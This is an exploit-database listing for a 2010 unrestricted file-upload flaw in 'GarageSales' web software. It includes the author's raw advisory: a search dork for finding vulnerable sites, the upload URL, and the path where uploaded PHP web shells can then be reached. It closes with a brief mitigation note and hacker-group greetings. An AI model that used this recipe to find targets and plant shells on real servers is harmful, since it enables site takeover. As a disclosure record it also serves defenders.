header-logo
Suggest Exploit
vendor:
N/A
by:
saidinh0
7,5
CVSS
HIGH
Remote Upload Vulnerability
434
CWE
Product Name: N/A
Affected Version From: 2004
Affected Version To: 2008
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux/Unix
2010

GarageSales Remote Upload Vulnerability

This vulnerability allows an attacker to upload malicious files to a vulnerable web server. The vulnerable web server is identified by a dork inurl:post.php?Category=Garage. After the malicious file is uploaded, it can be accessed via http://[site]/up_files/YouRShell.php

Mitigation:

Ensure that the web server is configured to only allow the upload of files with specific extensions and that the web server is configured to only allow the upload of files to specific directories.
Source

Exploit-DB raw data:

# Exploit Title: [GarageSales Remote Upload Vulnerability]
# Date: [06/04/2010]
# Author: [saidinh0]
# Software Link: [N/A]
# Version: [2004/2008]
# Tested on: [Linux/unix]
# CVE : [if exists]
# Code : [N/A]
#Email : cgd@hotmail.com

###################################################
| Intorduction :`|

Hi everybody , This my first bug (Remote Upload Vulnerability) and I wish you like it :p
###################################################

[Dork ]:  inurl:post.php?Category=Garage

{exploit} :  http://127.0.0.1/post.php?Category=Garage

Example : http://[site]/searchgarage/post.php?Category=Garage

After you have uploaded your shells , you will find it in this Path : http://[site]/up_files/YouRShell.php


Example : http://[site]/searchgarage/up_files/1269813788CrewSheLL.php

###################################################


Greetz To  : All my friends :p , Dos02.com Team ,Moroccan H4x0rz

--=-=-=-=-Dos02.com , owned-m.com/cc , vid2all.com -=-=-=-=--=